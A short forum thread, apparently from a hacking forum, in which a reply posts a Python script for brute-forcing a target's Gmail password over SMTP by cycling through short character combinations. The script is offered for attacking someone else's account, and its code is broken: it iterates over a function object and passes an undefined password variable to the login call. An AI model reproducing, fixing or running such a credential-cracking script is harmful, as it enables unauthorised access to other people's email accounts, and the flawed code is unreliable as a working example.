![]() |
|
Screenshot doesn't contain any info that helps in identifying the tool post the name if you have |
Is that all the info you got ? |
you can only brute force for smtp |
Looking for something like this? Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 386px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">import itertools import smtplib smtpserver = smtplib.SMTP("smtp.gmail.com", 587) smtpserver.ehlo() smtpserver.starttls() user = raw_input("Enter Target's Address: ") def print_perms(chars, minlen, maxlen): for n in range(minlen, maxlen+1): for perm in itertools.product(chars, repeat=n): print(''.join(perm)) print_perms("abcdefghijklmnopqrstuvwxyz1234567890" , 2, 4) for symbols in print_perms: try: smtpserver.login(user, password) print "[+] Password Cracked: %s" % symbols break; except smtplib.SMTPAuthenticationError: print "[!] Password Inccorect: %s" % symbols</pre> </br></br> |
All times are GMT. The time now is 03:58 AM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.